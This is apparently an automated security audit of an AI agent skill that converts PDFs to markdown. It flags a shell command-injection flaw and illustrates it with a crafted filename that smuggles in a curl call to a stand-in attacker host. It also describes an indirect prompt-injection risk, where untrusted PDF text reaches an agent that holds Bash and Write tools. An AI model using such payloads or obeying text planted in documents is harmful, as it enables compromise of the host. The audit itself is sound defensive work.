skills/wordflowlab/agentsdk/pdfmd (Gen Agent Trust Hub)

pdfmd

Audit result: Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The skill's instructions in SKILL.md direct the agent to construct a shell command by interpolating a user-controlled file path into python skills/pdfmd/pdf_extract.py --input "<PDF 文件路径>". Because the path is placed inside a shell command string rather than passed as a separate argument, a crafted filename (e.g., "; curl attacker.com/ls #.pdf) could achieve arbitrary command execution on the host system.
  • PROMPT_INJECTION (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8) because it extracts text from untrusted PDF files and feeds it directly into the LLM for translation and formatting.
  • Ingestion points: The pdf_extract.py script reads external, potentially attacker-controlled PDF files via the pypdf library.
  • Boundary markers: The script uses weak, predictable markers like ===== 第 {i} 页 ===== which are easily bypassed by embedded instructions.
  • Capability inventory: The agent has access to Bash and Write tools, providing a significant impact if an injection succeeds.
  • Sanitization: No sanitization or filtering of the extracted text is performed before it is presented to the LLM for processing.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 17, 2026, 06:31 PM